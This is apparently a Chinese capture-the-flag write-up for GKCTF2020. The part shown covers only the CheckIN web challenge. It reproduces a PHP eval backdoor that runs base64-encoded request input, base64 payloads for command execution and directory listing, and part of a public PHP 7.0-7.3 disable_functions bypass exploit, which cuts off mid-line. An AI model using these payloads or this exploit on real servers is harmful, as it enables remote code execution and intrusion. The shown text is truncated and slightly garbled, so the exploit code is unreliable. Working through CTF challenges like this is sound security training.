GKCTF2020 web+misc

GKCTF2020 web+misc

文章目录

• web
• • CheckIN
  • cve版签到
  • 老八小超市儿
  • EZ三剑客-EzNode
  • EZ三剑客-EzWeb
  • EZ三剑客-EzTypecho
  • Node-Exe(unsolved)
• misc
• • Pokémon
  • code obfuscation(unsolved)
  • Harley Quinn

web

CheckIN

考点：代码审计，绕disable_functions

题目给了源码:

<title>Check_In</title>
<?php 
highlight_file(__FILE__);
class ClassName
{public $code = null;public $decode = null;function __construct(){z$this->code = @$this->x()['Ginkgo'];$this->decode = @base64_decode( $this->code );@Eval($this->decode);}public function x(){return $_REQUEST;}
}
new ClassName();

在__construct()中，传入Ginkgo参数，会被base64_decode，所以先base64编码一下RCE：

phpinfo();->cGhwaW5mbygpOw==

得到phpinfo()回显。
在disable_function看出禁用了很多函数。
先遍历一下目录：
payload：

?Ginkgo=dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw==

dmFyX2R1bXAoc2NhbmRpcignLi4vLi4vLi4vLi4vJykpOw==是var_dump(scandir('../../../../'));的base64编码，得到:

可以看到有一个readflag文件。连上蚁剑(话说我为什么扫目录)：

编码器选择base64可能不行，之前就卡这了，官方wp给出了一个自己写的编码器：

编码器选择自己的，连接成功：

果真执行不了。那就是绕disable_function了，有现成exp：
链接：.php
利用：

<?php# PHP 7.0-7.3 disable_functions bypass PoC (*nix only)## Bug: .php?id=72530## This exploit should work on all PHP 7.0-7.3 versions## Author: 
pwn("echo `/readflag` > /");//执行/readflag，把值写到
function pwn($cmd) {global $abc, $helper;function str2ptr(&$str, $p = 0, $s = 8) {$address = 0;for($j = $s-1; $j >= 0; $j--) {$address <<= 8;$address |= ord($str[$p+$j]);}return $address;}function ptr2str($ptr, $m = 8) {$out = "";for ($i=0; $i < $m; $i++) {$out .= chr($ptr & 0xff);$ptr >>= 8;}return $out;}function write(&$str, $p, $v, $n = 8) {$i = 0;for($i = 0; $i < $n; $i++) {$str[$p + $i] = chr($v & 0xff);$v >>= 8;}}function leak($addr, $p = 0, $s = 8) {global $abc, $helper;write($abc, 0x68, $addr + $p - 0x10);$leak = strlen($helper->a);if($s != 8) { $leak %= 2 << ($s * 8) - 1; }return $leak;}function parse_elf($base) {$e_type = leak($base, 0x10, 2);$e_phoff = leak($base, 0x20);$e_phentsize = leak($base, 0x36, 2);$e_phnum = leak($base, 0x38, 2);for($i = 0; $i < $e_phnum; $i++) {$header = $base + $e_phoff + $i * $e_phentsize;$p_type  = leak($header, 0, 4);$p_flags = leak($header, 4, 4);$p_vaddr = leak($header, 0x10);$p_memsz = leak($header, 0x28);if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write# handle pie$data_addr = $e_type == 2 ? $p_vaddr :<